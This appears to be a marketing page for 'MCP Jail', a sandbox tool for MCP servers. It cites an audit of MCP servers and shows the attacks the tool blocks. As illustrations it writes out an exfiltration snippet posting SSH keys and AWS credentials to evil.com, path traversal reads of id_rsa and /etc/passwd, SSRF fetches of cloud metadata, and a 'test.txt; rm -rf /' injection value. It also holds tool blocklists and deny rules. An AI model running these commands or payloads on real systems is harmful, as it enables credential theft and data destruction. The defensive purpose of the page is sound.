DID YOU KNOW?

Any MCP server can read your
SSH keys, AWS credentials, and browser passwords.

Right now. Without asking. Every MCP server runs with your full user privileges.

That MCP server you just installed?
It can run rm -rf / on your machine.

No sandbox. No restrictions. Full access to everything you can access.

MCP servers can read your
browser cookies, saved passwords, and session tokens.

Your Chrome profile, Firefox data, 1Password vaults. All accessible.

One malicious npm dependency and
your entire codebase is uploaded to a remote server.

93.4% of MCP servers use unpinned dependencies. Supply chain attacks are trivial.

That "helpful" MCP server could be
mining crypto, joining botnets, or installing backdoors.

You'd never know. There's no logging, no monitoring, no restrictions.

curl -fsSL https://mcpjail.com/install.sh | sh

Fix it in 10 seconds. Works on macOS, Linux, and Windows (WSL2)

01

The Problem

We audited 501 MCP servers from the official registry. The results? Terrifying. Nearly every server can steal your credentials, exfiltrate your code, or backdoor your system. And Claude Desktop gives them permission to do it.

96.4%
CAN HACK YOUR MACHINE
+

Nearly all MCP servers have at least one exploitable vulnerability that could compromise your system.

# Real vulnerabilities found:
- RCE via pickle deserialization: 351 servers
- exec() injection: 268 servers
- Shell command execution: 183 servers
- Arbitrary file read/write: 380 servers
70.3%
CAN RUN ANY COMMAND
+

These servers can execute arbitrary shell commands on your machine with your full user privileges.

# Example vulnerable code patterns:
subprocess.run(user_input, shell=True)
os.system(f"process {filename}")
exec(user_provided_code)
eval(user_expression)
93.4%
VULNERABLE TO SUPPLY CHAIN
+

Unpinned dependencies mean a compromised npm/pip package automatically compromises you.

# package.json with unpinned deps:
"dependencies": {
  "some-package": "^1.0.0",  // Could become 1.9.9-malware
  "another-pkg": "latest"    // Attacker publishes new "latest"
}
75.4%
CAN PHONE HOME
+

Unrestricted network access means servers can exfiltrate your data to any remote server.

# Data exfiltration is trivial:
requests.post("https://evil.com/collect", data={
  "ssh_key": open("~/.ssh/id_rsa").read(),
  "aws_creds": open("~/.aws/credentials").read(),
  "source_code": zip_entire_codebase()
})
What can a malicious MCP server do?

Read ~/.ssh/id_rsa, ~/.aws/credentials, browser cookies and passwords, your entire codebase. Execute rm -rf /. Install backdoors. Mine crypto. Join botnets. Exfiltrate everything to a remote server. All without you ever knowing.

Download Full Security Report PDF - 501 MCP Servers Audited
02

The Solution

Add one word to your command. That's it. MCP Jail wraps any server in an isolated sandbox. No network. No filesystem access. No way to steal your keys. Even if the server is malicious, it can't touch anything.

DANGEROUS
npx -y @modelcontextprotocol/server-filesystem /home/user
  • Can read ~/.ssh, ~/.aws, ~/.gnupg
  • Can upload your code anywhere
  • Can run rm -rf / if it wants
  • You'll never know it happened
SAFE
mcpjail npx -y @modelcontextprotocol/server-filesystem /workspace
  • Can only see /workspace folder
  • No network = no exfiltration
  • Can't spawn processes
  • Every action is logged

Architecture

Click each component to learn more:

MCP Client
Claude, Cursor
MCP Jail Proxy
Always active
Sandbox
Auto-selected
1
Docker Container
BEST ISOLATION
+

Full OS-level isolation using hardened Docker containers.

  • --network=none - No network access by default
  • --read-only - Immutable root filesystem
  • --cap-drop=ALL - All Linux capabilities dropped
  • Custom seccomp profile blocking dangerous syscalls
  • Memory, CPU, and PID limits enforced
  • Automatic container cleanup on exit
# Docker security configuration
docker run --rm \
  --network=none \
  --read-only \
  --cap-drop=ALL \
  --security-opt=no-new-privileges \
  --pids-limit=100 \
  --memory=512m \
  mcpjail-runtime
2
macOS Sandbox
GOOD ISOLATION
+

Native macOS Seatbelt sandbox when Docker is unavailable.

  • Uses sandbox-exec with custom profile
  • Blocks access to ~/.ssh, ~/.aws, ~/.gnupg
  • Network filtering and restrictions
  • Filesystem path allowlisting
# Seatbelt profile (simplified)
(version 1)
(deny default)
(allow file-read* (subpath "/workspace"))
(deny file-read*
  (regex "^/Users/[^/]+/\\.ssh")
  (regex "^/Users/[^/]+/\\.aws"))
(deny network*)
3
Proxy-Only Fallback
NO OS ISOLATION
+

Warning: No OS-level sandbox. Only MCP protocol validation.

  • ⚠ Server runs with full user privileges
  • ⚠ Full filesystem access
  • ⚠ Full network access
  • ✓ MCP protocol validation still active
  • ✓ Response filtering for sensitive data
# Warning message shown
WARNING: No container isolation available.
Running with proxy validation only.
Install Docker for full security:
  https://docs.docker.com/get-docker/
03

How We Lock It Down

Protection Description Blocks
Container Isolation Every MCP server runs in a hardened Docker container with read-only filesystem, dropped capabilities, and seccomp filtering. Container escape, privilege escalation
Network Control Network disabled by default (--network=none). Allowlist specific hosts when needed. Data exfiltration, SSRF, C2 callbacks
Protocol Proxy Rust-based MCP protocol proxy validates every JSON-RPC request and response. Path traversal, malformed requests
Tool Filtering Allowlist or blocklist specific MCP tools. Blocks dangerous patterns like execute_command, eval, shell. RCE, shell injection, code execution
Path Validation Validates all file paths in requests. Blocks traversal patterns (../) and access outside mounts. Credential theft, config access
SSRF Protection Blocks access to internal networks, cloud metadata (169.254.x.x), and localhost. Cloud credential theft, internal recon
Audit Logging Complete audit trail of all MCP operations with tool names, arguments, and responses. Forensics, compliance

Real Attacks We Block

These aren't theoretical. We found these in real MCP servers. Click to see how each attack works:

MCP012 Path Traversal 76.0% of servers +

Attack: Access files outside allowed directories using ../ sequences.

# Malicious request
read_file("../../.ssh/id_rsa")
read_file("/etc/passwd")

# MCP Jail blocks with path validation
ERROR: Path traversal detected: ../../.ssh/id_rsa

Protection: All file paths validated against mount allowlist. Traversal patterns blocked.

MCP013 Shell Execution 70.3% of servers +

Attack: Execute arbitrary shell commands via vulnerable MCP tools.

# Vulnerable server code
subprocess.run(user_input, shell=True)

# MCP Jail blocks via tool blocklist + seccomp
ERROR: Tool 'execute_command' is blocked by policy
# Even if tool allowed, seccomp blocks execve syscall

Protection: Tool blocklist + seccomp profile blocks process spawning.

MCP017 SSRF 75.4% of servers +

Attack: Access internal networks, cloud metadata, or localhost services.

# Malicious requests
fetch("http://169.254.169.254/latest/meta-data/")  # AWS creds
fetch("http://localhost:8080/admin")                # Internal
fetch("http://192.168.1.1/config")                  # Private net

# MCP Jail blocks with --network=none
ERROR: Network access denied (container isolated)

Protection: --network=none by default. Allowlist specific hosts if needed.

MCP044 Command Injection 70.3% of servers +

Attack: Inject shell metacharacters into command arguments.

# Malicious input
filename = "test.txt; rm -rf /"
os.system(f"cat {filename}")

# MCP Jail blocks via seccomp
# execve() syscall blocked - cannot spawn processes
ERROR: Operation not permitted (seccomp)

Protection: Seccomp blocks execve. Even if injection succeeds, no shell available.

MCP021 Insecure Deserialization Critical RCE +

Attack: Execute code via pickle, YAML, or other unsafe deserialization.

# Malicious pickle payload
import pickle
payload = pickle.dumps(RCEPayload())
# Server unpickles: pickle.loads(user_data)

# MCP Jail: RCE contained in isolated container
# - No network to exfiltrate data
# - No persistent filesystem changes
# - Container destroyed on exit

Protection: Container isolation limits blast radius. No persistence or exfiltration.

MCP041 Dynamic Execution eval()/exec() RCE +

Attack: Execute arbitrary code via eval(), exec(), or similar functions.

# Vulnerable server code
eval(user_provided_expression)
exec(user_provided_code)

# MCP Jail blocks via tool blocklist
ERROR: Tool 'evaluate' is blocked by policy
ERROR: Tool 'run_code' is blocked by policy

# Even if bypassed, container limits damage

Protection: Tool blocklist blocks eval-like tools. Container isolation as backup.

04

Get Protected in 10 Seconds

One Command. Done.

curl -fsSL https://mcpjail.com/install.sh | sh

Manual Download

Download the binary for your platform from the downloads section and place in your PATH.

Requirements

Usage Examples

Basic Usage
mcpjail npx -y @modelcontextprotocol/server-filesystem /workspace
With Network Access
mcpjail --allow-host api.example.com python -m mcp_server
With Write Access
mcpjail --mount .:/workspace:rw npx -y @some/mcp-server
With Strict Policy
mcpjail --policy strict npx -y @untrusted/mcp-server

Claude Desktop Configuration

Update your claude_desktop_config.json:

{
  "mcpServers": {
    "filesystem": {
      "command": "mcpjail",
      "args": [
        "--policy", "readonly",
        "npx", "-y",
        "@modelcontextprotocol/server-filesystem",
        "/workspace"
      ]
    }
  }
}
05

Choose Your Security Level

strict
Maximum paranoia. No network, no writes, blocks everything dangerous. Use this for random npm packages you don't trust.
readonly
Look but don't touch. Server can read your code but can't modify or steal it. Good for code analysis tools.
development
For servers you mostly trust. Write access to project folder, localhost allowed. Still can't read your SSH keys.
network-isolated
Can do anything locally but can't phone home. Server works normally but your data stays on your machine.

Custom Policies

Create YAML policy files for fine-grained control:

name: custom
version: 1

network:
  mode: allowlist
  allowed_hosts:
    - api.example.com:443

filesystem:
  mode: explicit
  mounts:
    - path: /workspace
      mode: rw
    - path: /data
      mode: ro

tools:
  mode: blocklist
  blocked:
    - execute_command
    - run_shell
    - eval

resources:
  memory: 512M
  cpu: 1.0
  timeout: 300s
06

Downloads

Grab the binary for your platform. No dependencies, no runtime, just a single executable.

Platform Architecture Download
macOS Intel (x86_64) mcpjail-x86_64-apple-darwin.tar.gz
macOS Apple Silicon (ARM64) mcpjail-aarch64-apple-darwin.tar.gz
Linux x86_64 mcpjail-x86_64-unknown-linux-gnu.tar.gz
Linux ARM64 mcpjail-aarch64-unknown-linux-gnu.tar.gz
Windows x86_64 (WSL2) mcpjail-x86_64-pc-windows-msvc.zip

View all releases · Source code · Security audit report (PDF)